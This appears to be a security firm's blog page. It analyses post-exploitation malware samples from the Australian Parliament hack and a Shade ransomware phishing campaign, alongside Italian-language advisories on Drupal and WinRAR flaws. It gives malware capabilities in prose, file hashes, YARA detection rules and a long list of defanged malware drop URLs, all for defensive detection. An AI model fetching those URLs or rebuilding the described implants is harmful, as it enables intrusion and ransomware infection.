The Arsenal Behind the Australian Parliament Hack

Introduction

In the past days, an infamous cyber attack targeted an high profile target on the APAC area: the Australian Parliament House. As reported by the Australian prime minister there was no evidence of any information theft and the attack has been promptly isolated and contained by the Australian Cyber Security Centre (ACSC), however the attackers gained access the ruling Liberal and National coalition parties networks as well as the opposition Labor Party, just few months before the federal election. The first technical insight points to sophisticate state sponsored threat actors operating in the Pacific region, but no official statement has been been published and the speculation that China was behind the attack is not confirmed in any way.

Contextually to the cyber incident disclosure to the public, the ACSC declassified some of the samples involved in the parliament hack, so the Cybaze-Yoroi ZLab team decided to investigate these artifacts to have an insight of Tools and Capabilities of part of this APT cyber arsenal.

Technical analysis

All the analyzed files seem to be related to a post-exploitation phase, where the attacker leveraged them to conduct data exfiltration and lateral movements. All the modules don’t belong to an open-source post-exploitation framework, like Metasploit or Empire, but they seem to be written from scratch using the high-level language C# on top of the .NET Framework.

The LazyCat DLL

The firstly analyzed sample is known in the InfoSec community. The malware is named LazyCat, mainly derived by the famous Mimikatz pentest tool.

HashSha256: 1c113dce265e4d744245a7c55dadc80199ae972a9e0ecbd0c5ced57067cf755b
ThreatLazyCat
DescriptionLazyCat DLL to perform local privilege escalation
Ssdeep1536:kxnT6jqsSwI1ChVKt5QtkJBDbFw+IPpUuOE7qBp69bfeL:kxCpSz1CyIGrbgKuNS69bA

Table 1: Information about LazyCat sample.

A first static analysis shows the library is written in .NET, with no heavy obfuscation, and therefore easily revertable to its source-code like representation.

Figure 1: Static info about LazyCat sample.
Figure 2: Part of malware’s code.

An interesting function spotted in the code reveal its capability to inspect and gather the contests of an arbitrary process memory, through the usage of the MiniDumpWriteDump function belonging to DbgHelp library. The function’s result will be stored in a file just created using “Output” string parameter as name (Figure 3).

Figure 3: DumpMemory function.

Moreover, the malware is able to start a “TcpRelay” service, probably with the intent of create a route between the attacker’s network and the victim’s one and then to make the lateral movements easier.

Figure 4: StartTcpRelay function.

Exploring source code,  a particular module named “RottenPotato” emerges. It contains some interesting functions, such as  “findNTLMBytes” and “HandleMessageAuth”, related to the post-exploitation phase in MS Windows environments. After a quick search, it is possible to discover it is an open source tool publicly available on GitHub at https://github.com/foxglovesec/RottenPotato.

Figure 5: findNTLMBytes function.

Making a diff analysis between the Github source code and the malware’s one, emerges that some functions included into malware’s RottenPoteto are not present into public source code. This indicates that the cyber attacker has further weaponized the code to make it more effective for the malicious goal. At the same time, the usage of code publicly available and open source tools makes more difficult a punctual attribution of the weapons to a particular cyber group.

The LazyCat sample owns a specific module clerks to cover tracks, named “LogEraser”.

Figure 6: LazyCat.LogEraser module.

The main function of the module is “RemoveETWLog” which has the purpose of delete the ETW (Event Tracing for Windows) files related to the malicious actions the attacker has done.

Figure 7: Code to delete Windows log events.

As shown in the above figure, the malware scans all the records belonging to the Windows Log and, if the record ID is equal to the given ID, it will be deleted.

At time of analysis, the sample had a middle-low  detection rate, probably due to the customization of  open source code-snippets; the result of VirusTotal analysis is visible in the following figure:

Figure 8: LazyCat detection.

The Powerkatz DLL

HashSha256: 08a85f5fe8714b4842180c12c4d192bd186500af01ee39825f6d5100a2019ebc
ThreatGeneric
Descriptionpowerkatz DLL
Ssdeep192:RPmh9ncu5qqTz3XQUOsnoGWX4L4Lzn066HVV1GfzacScaz/69ek4VUAVc:ucuqqTz3gUOsnoGWoL4Lz0661V1PcS5V

Table 2: key information about powerkatz (sample 2)

HashSha256: a95c9fe29a8ae0f618536fdf4874ede5412281e8dfb380bf1370a8d8794f787a
ThreatGeneric
Descriptionpowerkatz DLL
Ssdeep192:BPmh9ncu5qqTz3XQUOsnoGWX4L4Lan066HVV1GfzacScazu69ek4VUf:ecuqqTz3gUOsnoGWoL4L00661V1PcS57

Table 3: key information about powerkatz (sample 3)

Despite the different hashes, the malicious functionalities within the DLL are the substantially the same, the attacker simply modified some strings and variables names, probably to evade av detection. The similarity between the samples is shown in Figure 9, where is possible to see the differences are minimal and they don’t impact the overall behavior.

Figure 9: Diff analysis between the samples.

The decompiled source code of the main class also confirms this similarity, i.e. inside the   AsyncTask class in Figure 10. For this reason we will reference a single sample in the following paragraphs.

Figure 10: Comparison between AsyncTask class of both samples.

The sample is composed by few classes and functions, one of them seems a good starting point for our analysis: the “StartNew”. As intended by its name, it is able to start a new asynchronous task on the victim’s machine, executing the task object passed as _app parameter. Once the task is started, the function waits its completion using repeated 1-sec sleeps cycle, and then it returns a valid code status to the function caller. Probably this module can be used in conjunction with some other functions, belonging to other pieces of the implant, to perform malicious actions in background, making all more stealth.

Figure 11: Source code of the StartNew function.

The name of this sample, Powerkatz, reminds to a tool available on GitHub ( https://github.com/digipenguin/powerkatz) but even if the name is the same, the code is different.  As the previous sample, also the detection rate of this sample, 28 of 70, is not high, as shown in Figure 11.

Figure 12: Samples detection rate.

The Recon Module

HashSha256: b63ae455f3deaca297b616dd3356063112cfda6e6c5434c407781461ae69361f
Threatgeneric
Descriptionport scanner DLL
Ssdeep192:P4NjWnNsFM+5Ic8l5OG/i1/5gK0kbhdeODo3:P4NWnuf5Ic8l21iK0IhDS

Table 4: key information about port scanner sample

Like other samples, it is written C# programming language too. It has two main classes named “PortScanner” and “ReconCommonFuncs”, providing a direct clue of the actions enabled by this part of the implant.

Figure 13: Sample’s classes.

Reading the first one’s code, in fact, the “portScan” contains an Integer array listing few of the well-known network ports, covering major local network services such as HTTP, TELNET, RDP, POP, IMAP, SSH, SQL .. .

Figure 14: Array containing the port numbers to scan.

For each declared port, the function is able to perform a TCP scan, trying to connect to it. If there is an available service behind the port, it responds with its own service banner, which will be stored into a “StringBuilder” object. The malware concatenates the responses from all the scanned ports and finally it writes the results in a file using the “ReconCommonFuncs” class.

Figure 15: Code to perform port scan.
Figure 16: Usage of TcpClient C# class to perform scan.

The “ReconCommonFuncs” class, instead, provides some utility functions, such as “Append” or “GZipAndBase64”, which are self-explanatory.

Figure 17: Functions belonging to ReconCommonFuncs class.

The Powershell Agent

HashSha256: 1087a214ebe61ded9f61de81999868f399a1105188467e4e44182c02ee264a19
Threatgeneric
DescriptionOfficeCommu DLL
Ssdeep3072:JbMNa4pc+32UhnsZFM7iCHF6aZ4oFlSAsBycrxAqSPWy3it5r2py2jYN/IroVbpm:JbWa4xmZcl9fFlSBtuZWQ6qp8DrhFJ

Table 5: key information about the sample

The last sample analyzed by Yoroi ZLab - Cybaze is called “OfficeCommu.dll”, probably with the intent of being confused with the legit Office Communication module available on most Windows machines.

Also this sample is a sort of utility, probably used in the post-exploitation phase, with the  purpose of creating a “PowershellAgent”, a stager component of the implant able to parse and execute Powershell commands.

Figure 18: PowershellAgent’s main function.

Conclusion

The analyzed samples show the attackers choose a multi-modular approach for the development of their cyber-arsenal, realizing a complex implant leveraging an ecosystem of libraries providing proper functionalities to conduct advanced, and offensive, cyber operations.

Despite these functions and libraries does not appear to contain any zero-day exploit or techniques, the detection of these modules within a high value perimeter such as the Australian Parliament provides important indication on cyber arsenal development strategies of this threat actor, revealing the abuse and the customization of open-source PenTest tools and proof of concept is one of the preferred way the attackers used to build their arsenal, possibly due to the lower the “time-to-market” and resources required to write it, without impacting its effectiveness and dangerousness.

Showing also, how these supposedly “known” techniques and tools can be easily repackaged in evasive and silent implants, capable to bypass the traditional kinds of security boundaries.

Indicator of Compromise

Hashes

1c113dce265e4d744245a7c55dadc80199ae972a9e0ecbd0c5ced57067cf755b
08a85f5fe8714b4842180c12c4d192bd186500af01ee39825f6d5100a2019ebc
a95c9fe29a8ae0f618536fdf4874ede5412281e8dfb380bf1370a8d8794f787a
b63ae455f3deaca297b616dd3356063112cfda6e6c5434c407781461ae69361f
1087a214ebe61ded9f61de81999868f399a1105188467e4e44182c02ee264a19

Yara Rules

import "pe"
rule LazyCat_22_02_2019{

	meta:
  	description = "Yara Rule for LazyCat"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_02_22"
  	tlp = "white"
  	category = "informational"

	strings:
   		$a = "LazyCat"
    		$b = {48 74 74 70 53 65 72 76 65 72 4C 6F}
    		$c = {0A 58 73 9E 00 00 0A 2A 0F 00 28 B0}
    		$d = {80 A1 4E CD 13 56 80 9F}

	condition:
    		pe.number_of_sections == 3 and pe.machine == pe.MACHINE_I386 and (($b and $c and $d) or ($a))
}

import "pe"
rule Powerkatz_22_02_2019{

	meta:
  	description = "Yara Rule for Powerkatz"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_02_22"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a1 = {C7 E8 3F}
    		$b1 = {7C 43 3D}
    		$a2 = {A4 58 24 8A 3A 36 8D 4B 89 15 15 33 CE 1D 1D F2}
    		$b2 = {A9 B5 2D 2A 00 47 AC 44 97 7A F5 D0 04 09 75 13}

	condition:
    		pe.number_of_sections == 3 and pe.machine == pe.MACHINE_I386 and (($a1 or $b1) and ($a2 or $b2))
}

import "pe"
rule Office_Commu_22_02_2019{

	meta:
  	description = "Yara Rule for Office_Commu"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_02_22"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = {61 E0 4B A1 1D C6 2F A7}
    		$b = {8F D2 A9 E3 70 5A B4 D9 92 1D BA}
    		$c = "Kill"
    		$d = {DB 71 F5 4C B0 29 27 20 B8}
    		$e = "get_IsAlive"

	condition:
    		pe.number_of_sections == 3 and all of them
}

import "pe"
rule eba_sample_22_02_2019{

	meta:
  	description = "Yara Rule for 1eba_sample"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_02_22"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = {4A 02 73 29 00 00 0A 7D}
    		$b = {F8 01 7A 00 1B 00 54 28}
    		$c = "portScan"
    		$d = {C9 45 99 B9 AA AD C7 46}
    		$e = "parseHost"

	condition:
    		pe.number_of_sections == 3 and all of them
}

This blog post was authored by Davide Testa, Antonio Farina and Luca Mella of Cybaze-Yoroi Z-LAB

Gravissima Criticità su Piattaforme Drupal

Proto: N060219.

Con la presente Yoroi desidera informarLa relativamente ad una pericolosa vulnerabilità recentemente scoperta all’interno del popolare Content Management System Drupal, una tra le tre soluzioni CMS più utilizzate in tutto il mondo per la realizzazione di decine di migliaia di portali web. La criticità è nota con l’identificativo CVE-2019-6340.

A causa di lacune nella de-serializzazione di parametri utente all’interno del modulo API RESTful, utilizzato per la realizzazione di integrazioni, applicazioni moderne ed abilitato di default in varie versioni del CMS stesso, un attaccante remoto in grado di interagirvi con richieste di tipo GET, PATCH oppure POST può eseguire codice arbitrario sul sistema vittima, compromettendolo senza alcuna autenticazione richiesta.

Il Produttore ha recentemente innalzato il livello di rischio associato alla problematica per via del rilascio di dettagli tecnici e strumenti atti a replicare la criticità; circostanza che rende probabile lo sfruttamento di questa vulnerabilità da parte di botnet ed attaccanti di vario genere, alla stregua di quanto registrato nei casi Drupalgeddon e Drupalgeddon2.

All’interno del bollettino di sicurezza SA-CORE-2019-003 sono stati inoltre rilasciati gli aggiornamenti di sicurezza volti a risolvere la problematica per le versioni Drupal:

Non hanno invece ricevuto aggiornamenti le versioni Drupal 7 e Drupal 8 inferiori a 8.5 in quanto terminato il periodo di supporto, tuttavia, al fine di mitigarne possibilità di compromissione, Yoroi consiglia di aggiornare gli eventuali moduli di terze parti che utilizzano API RESTful Drupal, di filtrare richieste REST GET/PUT/PATH/POST qualora non utilizzate e di valutare il rimpiazzo dei portali Drupal obsoleti.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index


Gravi Criticità in WinRAR

Proto: N050219.

Con la presente Yoroi desidera informarLa relativamente ad una recente serie di vulnerabilità scoperta all'interno del software di gestione archivi Compressi WinRAR, la cui popolarità negli anni l’ha reso uno dei principali strumenti di archiviazione anche in ambiti professionali. Le criticità sono note con gli identificativo CVE-2018-20250, CVE-2018-20251, CVE-2018-20252 e CVE-2018-20253.

Le problematiche nascono da lacune nella gestione degli input all’interno nella libreria “unacev2.dll”, risalente al 2005 e parte del software WinRAR, dove ricercatori di sicurezza hanno individuato molteplici possibilità di abuso durante l’apertura di archivi in formato ACE. Questi rilievi rendono possibili scenari di attacco operabili da attori di minaccia remoti, i quali, attraverso tecniche di Watering-Hole o Spear-Phishing, possono essere in grado di:

Il Produttore ha confermato la problematica per tutte le versioni WinRAR recenti, rilasciando l’aggiornamento 5.70 beta 1.

Benché non siano stati al momento rilevati attacchi in-the-wild utilizzanti queste vulnerabilità, la disponibilità di dettagli tecnici atti a riprodurre le problematiche rappresentano un fattore non trascurabile per cui Yoroi suggerisce di valutare il blocco degli archivi “ACE” all’interno del Vostro perimetro, qualora non comunemente utilizzati a fini lavorativi.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Ondata di Attacchi Con Archivi Cifrati

Proto: N040219.

Con la presente Yoroi desidera informarLa relativamente ad una pericolosa campagna di attacco in corso in questi giorni ai danni di organizzazioni italiane. Gli attacchi sono caratterizzati dall’abuso di comunicazioni email realmente intercorse tra vittime ed indirizzi di posta mittenti delle email infette. Questo modus operandi è già stato rilevato nel corso di varie ondate di campagne di attacco Ursnif nel corso del 2018, riportate all’interno dei bollettini Early Warning N010518, N040318, N040618 e N040718.

Questa nuova ondata di messaggi fraudolenti è caratterizzata inoltre dalla presenza di allegati compressi protetti da password, al cui interno sono piazzati documenti malevoli in grado di iniziare la catena di infezione Ursnif ai danni dell’host vittima. L’utilizzo di questo stratagemma rappresenta un rischio di sicurezza in quanto i messaggi malevoli possono aver maggiori probabilità di evadere gli eventuali controlli perimetrali ai quali la corrispondenza in ingresso è sottoposta.

Di seguito si riportano gli indicatori di compromissione individuati durante le analisi:


Figura. Esempio di contenuto del messaggio

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

The Long Run of Shade Ransomware

Introduction

Between January and February, a new, intense, ransomware campaign have been observed by many security firms. It spreads Shade/Treshold variants, one of the most dangerous threats in the cyber crime scenario, known since its massive infection into the Russian panorama back in 2015, its expansion has been tracked by several CSIRTs and CERTs all across the world. As stated in a recent Eset report, the Shade infection had an increase during October 2018, keeping a constant trend until the second half of December 2018, taking a break around Christmas, and then resuming in mid-January 2019 doubled in size (shown in Figure 1).

Figure 1. Trend of malicious JavaScript downloading Shade ransomware (source: ESET).

The last attack waves was pretty interesting because the criminals tried to impersonate Russian Oil and Gas companies, in particular  the Russian’s “PAO NGK Slavneft”, probably to hit a portion of this industry segment. Cybaze-Yoroi ZLab analyzed some recent samples spreading during the last week.

Technical analysis

The chosen infection vector is the email one, usual and effective. The phishing email contains a .zip file named “slavneft.zakaz.zip”, which means something like “slavneft order” in English, showing a direct reference to “Slavneft”. It contains a russian speaking JavaScript file named “«ПАО «НГК «Славнефть» подробности заказа”, corresponding another time to “PAO NGK Slavneft order details”.

Figure 2. References to an Oil-Gas company

This file acts as downloader in the infection chain, using a series of hard-coded server addresses, It heavily rely on obfuscation and encryption to avoid the antimalware detection.

Figure 3. JavaScript decryption routine

A few round of debugging and decryption reveals its inner, cleartext code:

Figure 4. Main of the JS script.

The figure above highlights some interesting details: if the first HTTP request fails, the second one is not sent, but the variable “qF” is initialized with the other malicious URL. It runs several times the payload only if the first server could be reached.

Probably the JavaScript is under maintenance yet, so the attacker could insert other code lines next, in order to retrieve the sample from other sources.

All the resources loaded by the JavaScript downloader points to compromised websites, mostly running WordPress and Joomla CMSs. According to other firms, Treshold is able to leverage a “worm” module designed to search and brute-force the login pages of several known CMS applications, such as WordPress and Joomla; an odd coincidence.

Once it gets in the websites, it uploads a copy of the executable code: using this approach the malware keeps creating backup copies to increase its resiliency to takeovers. However, the sample delivered in the last intercepted campaign is not configured to exploit this feature.

Hashbf32e333d663fe20ab1c77d2f3f3af946fb159c51b1cd3b4b2afd6fc3e1897bb
ThreatShade ransomware
DescriptionFake image containing shade ransomware malware
Ssdeep24576:kcDD3THmsmB7K1k52fzgtv0HqIYG3yC3Q1KbeRho7KWU8RKDyAlAY:bTHmsq72zgtv0HYG37bD7KWU8UhV

Table 1: shade ransomware informations.

Despite its popularity, the Shade payload, at the analysis time, did not show high detection rates: only a third of antimalware detected it (24/69), even if the behaviour of the threat is such harassing as recognizable. Shade encrypts all the user files using an AES encryption scheme. Then, it appends’em the “.crypted000007” suffix and creates the ransom note in each system’s folder, the text is written in both English and Russian language.

Figure 5. VirusTotal view reporting the malware’s detection rate.
Figure 6. Background of the infected machine, after encryption phase.
Figure 7. Content of README.txt file.

Navigating on the specified darknet website, it is shown a page containing a form to get in touch with the attacker, specifying the code extracted from ransom note and an email:

Figure 8. Ransomware Onion website.

Analyzing other 2017’s threat reports, we noticed the address did not changed over time, different story for the email address.

Figure 9. Comparison between the ransom note of Shade 2019 (up) and Shade 2017 (down, source: SonicWall).

Shade connects to its C2 server using embedded TOR libraries and downloads additional modules, such as the aforementioned “CMSBrute” or the “ZCash miner” one. The behavioural analysis session recorded the executions of the ZCash miner, stored in the  “C:\ProgramData\SoftwareDistribution\” folder.

Figure 10. Information about miner executable.

A quick review of the launching parameters shows interesting information:

Despite this important information, it’s difficult to identify the real cashed out amount because attackers typically use mixing techniques to divert the investigations. However, the mining pool dashboard provides a clue of the current number of infected machines.

Figure 11. Flypool dashboard reporting info about attacker’s wallet.

Conclusions

The  OSINT information available places the origin of the Treshold threat in the mid of the 2017, showing the attackers didn’t change too much their modus operandi and infrastructure, the same wallet ID has been maintained over the year, propagation techniques and patterns are quite constant too.

Moreover, the huge list of compromised sites, reported in the IoC section, demonstrates once again how the usage of weak credentials is leveraged by such kind of threat actors to enable profitable, years-long malicious campaign without deep and costly changes in their TTPs.

Indicator of Comprimise

DropURL
11/02
hxxp://projectmmo[.]ru/blog/slavneft.zakaz.zip
hxxp://equiracing[.]fr/templates/rhuk_milkyway_equiracing/css/messg[.]jpg
hxxp://coptermotion[.]aero/css/messg[.]jpg
hxxp://usep75[.]fr/wp-content/themes/usep75-2011_/js/messg[.]jpg
hxxp://www.katharinen-apotheke-braunschweig[.]de/wp-content/themes/zerif-lite/css/messg[.]jpg
hxxp://www[.]coptermotion[.]aero/css/messg[.]jpg
hxxp://senital[.]co[.]uk/templates/a4joomla-ocean-free/js/messg[.]jpg
hxxp://meble-robert[.]pl/wp-content/themes/septera/cryout/css/messg[.]jpg
hxxp://grenop-invest[.]cz/bin/messg[.]jpg

13/02
hxxp://primeeast[.]net/images/slavneft.zakaz.zip
hxxp://service.baynuri[.]net/.well-known/acme-challenge/messg[.]jpg
hxxp://parrocchiadellannunziata[.]it/cache/_system/messg[.]jpg

14/02
hxxp://emlak.baynuri[.]net/wp-includes/ID3/messg[.]jpg
hxxp://aslike[.]org/templates/beez_20/css/messg[.]jpg
hxxps://sobornarada.gov[.]ua/templates/soborna/css/docx.zip
hxxps://sobornarada.gov[.]ua/templates/soborna/css/slavneft.zakaz.zip
hxxps://sobornarada.gov[.]ua/templates/soborna/css/messg[.]jpg
hxxps://nts-solution[.]net/wp-content/themes/Mobera/img/messg[.]jpg
hxxps://nts-solution[.]net/wp-content/themes/Mobera/img/slavneft.zakaz.zip
hxxp://ilan.baynuri[.]net/.well-known/acme-challenge/messg[.]jpg
hxxp://ilan.baynuri[.]net/.well-known/acme-challenge/slavneft.zakaz.zip
hxxp://rentacar.baynuri[.]net/wp-admin/css/colors/blue/messg[.]jpg
hxxp://rentacar.baynuri[.]net/wp-admin/css/colors/blue/slavneft.zakaz.zip
hxxp://deflektori[.]ru/buyme/i/slavneft.zakaz.zip
hxxp://presse.schmutzki[.]de/.well-known/acme-challenge/messg[.]jpg
hxxp://presse.schmutzki[.]de/.well-known/acme-challenge/slavneft.zakaz.zip

15/02
hxxp://lingvaworld[.]ru/media/system/css/messg[.]jpg
hxxp://3forfree[.]org/wp-content/themes/twentyseventeen/assets/css/messg[.]jpg
hxxp://firstbaptisthackensack[.]org/templates/hexa_corp/cache/messg[.]jpg
hxxp://caringsoul[.]org/includes/messg[.]jpg
hxxp://semiworldwide[.]net/templates/home/html/_mod_search/messg[.]jpg
hxxp://strewn[.]org/reductio/messg[.]jpg


hxxp://www.clermontmasons[.]org/wp-content/backwpup-c60dd-logs/messg[.]jpg
hxxp://efficientlifechurch[.]org/wp-content/plugins/backupcreator/messg[.]jpg
hxxp://www.taoday[.]net/wp-content/themes/twentyten/languages/messg[.]jpg
hxxp://master-of-bitcoin[.]net/.well-known/pki-validation/messg[.]jpg
hxxp://choinkimarkus[.]pl/wp-content/themes/unicon/framework/admin/ReduxCore/assets/css/color-picker/messg[.]jpg
hxxp://thu-san-world-challenges[.]org/wp-includes/ID3/messg[.]jpg
hxxp://na-korable[.]ru/websitemap/messg[.]jpg
hxxp://www[.]caringsoul[.]org/includes/messg[.]jpg
hxxp://stellacosmeticos[.]com/images/M_images/messg[.]jpg
hxxp://caringsoul[.]org/includes/messg[.]jpg
hxxp://semiworldwide[.]net/templates/home/html/_mod_search/messg[.]jpg
hxxp://lingvaworld[.]ru/media/system/css/messg[.]jpg
hxxp://strewn[.]org/reductio/messg[.]jpg
hxxp://firstbaptisthackensack[.]org/templates/hexa_corp/cache/messg[.]jpg
hxxp://3forfree[.]org/wp-content/themes/twentyseventeen/assets/css/messg[.]jpg
hxxp://manhtructhanhtin[.]com/wp-content/themes/flatsome/woocommerce/back-comp/cart/messg[.]jpg
hxxp://alax.nexxtech[.]fr/classes/logs/messg[.]jpg
hxxps://www.panska[.]cz/includes/messg[.]jpg
hxxp://aslike[.]org/templates/beez_20/css/messg[.]jpg
hxxps://www.hiwentis[.]de/wp-content/themes/Anthem/js/messg[.]jpg
hxxp://hiwentis[.]de/wp-content/themes/Anthem/js/messg[.]jpg
hxxp://wcf-old.sibcat[.]info/messg[.]jpg
hxxp://mobshop.schmutzki[.]de/.well-known/acme-challenge/messg[.]jpg
hxxp://p30qom[.]ir/templates/kalaresan/css/messg[.]jpg
hxxp://thorxer[.]de/templates/siteground-j15-85/images/messg[.]jpg
hxxp://northmaint.se/wp-content/themes/Divi/psd/messg[.]jpg
hxxp://mod.sibcat[.]info/messg[.]jpg
hxxp://www.blackout.pub/wp-content/themes/gutenberg/builder/templates/blog/formats/messg[.]jpg
hxxp://blackout.pub/wp-content/themes/gutenberg/builder/templates/blog/formats/messg[.]jpg
hxxp://www.medgen[.]pl/templates/medgen/less/messg[.]jpg
hxxp://medgen[.]pl/templates/medgen/less/messg[.]jpg
hxxp://www.medgen[.]pl/templates/medgen/html/com_content/article/messg[.]jpg
hxxp://medgen[.]pl/templates/medgen/html/com_content/article/messg[.]jpg
hxxp://akiko.izmsystem[.]net/wordpress/wp-admin/css/colors/blue/messg[.]jpg
hxxp://waterfordcomputers.ie/wp-content/themes/WCv15/includes/css/messg[.]jpg
hxxp://comsystem.ch/templates/orange/css/messg[.]jpg
hxxp://dreams-innovations[.]com/wp-content/themes/ecommerce-solution/inc/messg[.]jpg
hxxp://presse.schmutzki[.]de/.well-known/acme-challenge/messg[.]jpg
hxxp://klotho[.]net/wp/wp-admin/css/colors/blue/messg[.]jpg
hxxp://katharinen-apotheke-braunschweig[.]de/wp-content/themes/zerif-lite/css/messg[.]jpg
hxxp://coptermotion.aero/css/messg[.]jpg
hxxp://usep75[.]fr/wp-content/themes/usep75-2011_/js/messg[.]jpg
hxxp://lam[.]cz/templates/lam/css/messg[.]jpg
hxxp://parrocchiadellannunziata[.]it/cache/_system/messg[.]jpg
hxxp://senital[.]co.uk/templates/a4joomla-ocean-free/js/messg[.]jpg
hxxp://doktech.cba[.]pl/includes/Archive/messg[.]jpg
hxxp://www[.]coptermotion.aero/css/messg[.]jpg
hxxp://www.katharinen-apotheke-braunschweig[.]de/wp-content/themes/zerif-lite/css/messg[.]jpg
hxxp://meble-robert[.]pl/wp-content/themes/septera/cryout/css/messg[.]jpg
hxxp://grenop-invest[.]cz/bin/messg[.]jpg
hxxp://schmutzki[.]de/content/themes/schmutzki-child/img/devices/messg[.]jpg
hxxp://americanstaffordshireterrier[.]it/messg[.]jpg
hxxp://biurorachunkowe24.waw[.]pl/templates/ruralidyll/css/messg[.]jpg
hxxp://lipraco[.]cz/templates/lipraco/css/messg[.]jpg
hxxps://schmutzki[.]de/content/themes/schmutzki-child/img/devices/messg[.]jpg
hxxp://lutnikwitwicki[.]pl/templates/dd_horse_31/inc/messg[.]jpg
hxxp://rivercitylitho[.]com/templates/rt_anacron/css-compiled/messg[.]jpg
hxxp://rivercitylitho[.]com/templates/rt_anacron/custom/messg[.]jpg
hxxp://uborprofit[.]com/wp-content/themes/twentyseventeen/assets/css/messg[.]jpg
hxxp://erataqim[.]com.my/1/wp-admin/css/colors/blue/messg[.]jpg
hxxp://expert-centr[.]com/errordocs/style/messg[.]jpg
hxxp://home-spy-shop[.]com/wp-content/themes/magazine-basic/languages/messg[.]jpg
hxxp://schmutzki[.]de/content/themes/schmutzki-child/lang/messg[.]jpg
hxxp://pausin-fotografie[.]de/wp-content/themes/prophoto5/js/plugins/messg[.]jpg
hxxp://old.vide-crede[.]pl/administrator/cache/messg[.]jpg
hxxp://nkcatering[.]pl/wp-content/themes/vogue/templates/contents/messg[.]jpg
hxxp://berplamon[.]de/wp-content/themes/gridalicious/languages/messg[.]jpg
hxxp://nexxtech[.]fr/interactifs-aceto/messg[.]jpg
hxxp://asztar[.]pl/templates/theme1627/css/messg[.]jpg
hxxp://isolation.nucleus.odns[.]fr/wp-content/languages/plugins/messg[.]jpg
hxxp://brigitte-family[.]com/wp-content/languages/plugins/messg[.]jpg
hxxps://www.re-set[.]fr/wp-content/themes/theme1438/includes/images/messg[.]jpg
hxxps://www.thielepape[.]de/wp-content/themes/fizz/css/messg[.]jpg
hxxp://thielepape[.]de/wp-content/themes/fizz/css/messg[.]jpg
hxxp://immobilien-dresdner-land[.]de/wp-content/themes/fashionistas/css/messg[.]jpg
hxxp://re-set[.]fr/wp-content/themes/theme1438/includes/images/messg[.]jpg
hxxp://agence.nucleus.odns[.]fr/messg[.]jpg
hxxp://e-online[.]fr/templates/protostar/images/system/messg[.]jpg
hxxp://iventix[.]de/logs/messg[.]jpg
hxxp://nexxtech[.]fr/js/views/messg[.]jpg
hxxp://jonathantercero[.]com/wp-content/themes/sonata/admin/assets/css/messg[.]jpg
hxxp://aguimaweb[.]com/wp-content/themes/yes/languages/messg[.]jpg
hxxp://mztm[.]jp/docs/as3/as3corelib/com/adobe/air/logging/messg[.]jpg
hxxp://chuletas[.]fr/templates/ashton/css/messg[.]jpg
hxxp://mztm.sixcore[.]jp/messg[.]jpg
hxxp://mizutama[.]com/css/messg[.]jpg
hxxp://chuletas[.]fr/templates/ashton/html/com_contact/categories/messg[.]jpg
hxxp://quarenta[.]eu/wp-content/languages/loco/plugins/messg[.]jpg
hxxp://www.ijweaver[.]com/wp-content/themes/f2/images/color-schemes/messg[.]jpg
hxxp://brewmethods[.]com/vendor/composer/messg[.]jpg
hxxp://quarenta[.]eu/wp-includes/certificates/messg[.]jpg
hxxp://hopperfinishes[.]com/wp-content/themes/Centum/backend/css/messg[.]jpg
hxxp://www.nexxtech[.]fr/interactifs-aceto/messg[.]jpg
hxxp://therollingshop[.]com/wp-content/themes/therollingshop_v2/css.old/messg[.]jpg
hxxp://nexxtech[.]fr/css/fonts/font-awesome/css/messg[.]jpg
hxxp://www.nexxtech[.]fr/css/fonts/font-awesome/css/messg[.]jpg
hxxp://www.therollingshop[.]com/wp-content/themes/therollingshop_v2/css.old/messg[.]jpg
hxxp://lutnikwitwicki[.]pl/templates/dd_horse_31/language/en-GB/messg[.]jpg
hxxp://balkaniks[.]de/wp-content/ai1wm-backups/messg[.]jpg
hxxp://happysungroup[.]de/wp-includes/ID3/messg[.]jpg
hxxp://www.nexxtech[.]fr/js/views/messg[.]jpg
hxxp://www.immobilien-dresdner-land[.]de/wp-content/themes/fashionistas/css/messg[.]jpg
hxxp://co2services[.]be/templates/widescreen01/css/messg[.]jpg
hxxp://barbarapaliga[.]pl/cgi-bin/messg[.]jpg
hxxp://bobathsi[.]pl/cgi-bin/messg[.]jpg
hxxp://transforma[.]de/wp-content/themes/transforma/_/css/messg[.]jpg
hxxp://osiedle-polna[.]pl/cgi-bin/messg[.]jpg
hxxp://tb.ostroleka[.]pl/templates/siteground12/css/messg[.]jpg
hxxp://app-1536185165.000webhostapp[.]com/wp-content/themes/shapely/languages/messg[.]jpg
hxxp://lbermudez.000webhostapp[.]com/wp-content/themes/shapely/layouts/messg[.]jpg
hxxp://comments.hmmagic[.]com/.well-known/acme-challenge/messg[.]jpg
hxxp://lg4square[.]com/wp-content/themes/churchope/images/messg[.]jpg
hxxp://rosarioalcadaaraujo[.]com/wp-content/languages/loco/themes/messg[.]jpg
hxxp://somelie[.]jp/wp-content/themes/thematic/thematicsamplechildtheme/messg[.]jpg
hxxp://klotho[.]net/web_fonts/messg[.]jpg
hxxp://xavietime[.]com/wp-content/themes/seowp/inc/beacon-helper/messg[.]jpg
hxxp://www.klotho[.]net/wp/wp-admin/css/colors/blue/messg[.]jpg
hxxp://clubs.hmmagic[.]com/.well-known/acme-challenge/messg[.]jpg
hxxp://somelie[.]jp/wp-content/themes/thematic/library/extensions/messg[.]jpg
hxxp://tunisiagulf[.]com/wp-admin/css/colors/blue/messg[.]jpg
